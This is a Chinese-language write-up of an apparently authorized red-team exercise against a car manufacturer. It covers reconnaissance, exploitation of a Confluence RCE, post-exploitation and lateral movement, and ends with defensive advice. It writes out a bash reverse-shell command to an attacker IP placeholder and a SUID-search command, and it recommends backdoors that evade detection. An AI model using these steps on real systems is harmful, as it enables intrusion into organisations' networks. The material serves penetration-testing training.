攻防演练 | 记一次打穿某车企全过程
字数 1601 2025-08-10 16:34:22
车企网络攻防演练实战教学文档
0x00 前言
本教学文档基于一次真实的汽车企业网络攻防演练案例,详细记录了从外网渗透到内网的全过程。文档将按照攻击流程分步骤讲解,包含信息收集、漏洞利用、权限提升、横向移动等关键环节。
0x01 信息收集阶段
1.1 企业资产梳理
关键工具:自研信息收集脚本
步骤:
-
使用子公司收集脚本进行企业架构梳理
- 从一级公司开始搜索
- 查找控股50%以上的子公司
- 递归搜索至四级子公司
- 输出完整的公司控股关系树
-
资产收集流程
- 基于ICP备案信息
- 子域名枚举(使用工具如subfinder、amass等)
- 端口扫描(masscan/nmap)
- Web路径探测(dirsearch/gobuster)
- 服务指纹识别(nmap/banner识别)
-
输出三类文件:
- IP列表:用于后续的资产扫描
- URL列表:用于Web漏洞扫描
- 详情文件:记录服务详情供人工审计
1.2 自动化扫描
推荐工具组合:
- 资产扫描:灯塔(ARL)、FOFA、ZoomEye
- 漏洞扫描:xray、poc-bomber、Nuclei
- 子域名:OneForAll、Subfinder
- 端口服务:masscan+nmap组合
0x02 Web打点阶段
2.1 自动化扫描
执行流程:
- 使用xray等工具对收集的URL进行批量扫描
- 使用poc-bomber等开源POC框架测试已知漏洞
- 分析扫描结果,筛选有效漏洞
注意事项:
- 自动化扫描可能遗漏一些需要交互的漏洞
- 部分WAF可能拦截扫描行为
- 扫描结果需要人工验证
2.2 人工审计
审计重点:
-
识别特殊系统:
- 办公系统(OA、邮件)
- 开发协作系统(Confluence、Jira)
- 运维系统(Jenkins、GitLab)
- 物联网管理系统
-
本例中发现的关键系统:
- Confluence系统(标题为XXConfluence)
- 确认版本存在已知RCE漏洞
- 操作系统识别为Linux
2.3 漏洞利用
Confluence RCE利用步骤:
- 确认漏洞存在性(CVE-2022-26134等)
- 构造恶意请求执行命令
- 验证命令执行结果
- 建立反弹shell:
bash -i >& /dev/tcp/攻击IP/端口 0>&1 - 获取交互式shell
2.4 后渗透准备
-
上传持久化后门:
- 使用msfvenom生成Linux payload
- 上传并设置执行权限
- 确保后门能绕过常见检测
-
网络环境探测:
ifconfig 或 ip a- 发现内网IP:172.32.0.30
- 确认网络架构
-
代理工具部署:
- 上传frp/ngrok/reGeorg等工具
- 建立隧道连接内网
0x03 内网横向移动
3.1 内网信息收集
-
网络拓扑探测:
- 路由信息:
route -n - ARP缓存:
arp -a - 活跃主机扫描:
fping或内网版nmap
- 路由信息:
-
凭证收集:
- 查找配置文件
- 检索历史命令中的密码
- 检查常见凭证存储位置
3.2 权限提升
Linux提权方法:
-
内核漏洞利用:
- 使用uname -a查看内核版本
- 搜索对应exploit
-
SUID/GUID滥用:
find / -perm -4000 -type f 2>/dev/null -
定时任务检查
-
环境变量劫持
3.3 横向移动技术
- 密码喷洒攻击
- Pass-the-Hash攻击
- 利用内网服务漏洞
- 中间人攻击(如LLMNR/NBT-NS欺骗)
0x04 防御建议
4.1 针对Confluence防护
- 及时更新补丁
- 限制访问IP
- 启用双因素认证
- 配置Web应用防火墙规则
4.2 内网防护措施
- 网络分段隔离
- 部署终端检测与响应(EDR)
- 实施最小权限原则
- 监控异常网络连接
4.3 安全运维建议
- 定期红蓝对抗演练
- 建立威胁情报机制
- 完善日志收集与分析
- 制定应急响应预案
0x05 总结
本案例展示了从外网到内网的完整渗透流程,重点包括:
- 全面的信息收集是成功的基础
- 自动化与人工审计相结合
- 对常见企业系统的漏洞利用
- 内网环境的快速适应与横向移动
通过此类演练,企业可以更好地了解自身安全弱点,针对性加强防御措施。